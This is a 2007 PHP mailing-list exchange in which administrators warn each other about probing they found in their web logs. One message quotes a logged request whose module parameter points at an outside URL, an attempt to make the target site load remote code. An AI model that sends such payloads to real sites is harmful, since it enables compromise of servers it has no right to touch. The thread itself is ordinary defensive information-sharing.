On 10/5/07, Paul Scott <pscott@xxxxxxxxx> wrote: > > On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote: > > Yeah, honestly I wasn't sure if it was an injection attack or if > > those URLs were referrers in the logs. > > OK sorry if I wasn't 100% clear here, but the logs showed up something > like: > > http://fsiu.uwc.ac.za/index.php?module=http://www.goodasgold.com/nav > > So basically it was an XSS attempt, but because our MVC security is > decent, it is just more of an annoyance than anything else (it screws up > my stats man!) > > What I was trying to say is that *if* you didn't know about this one > before, now you do. They are hitting all of our sites at a rate of > knots, so are probably doing the same elsewhere. > > --Paul > > > All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm > > Sounds like a Joomla exploit attempt. Either way, thanks for the heads-up, Paul. -- Daniel P. Brown [office] (570-) 587-7080 Ext. 272 [mobile] (570-) 766-8107 Give a man a fish, he'll eat for a day. Then you'll find out he was allergic and is hospitalized. See? No good deed goes unpunished.... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php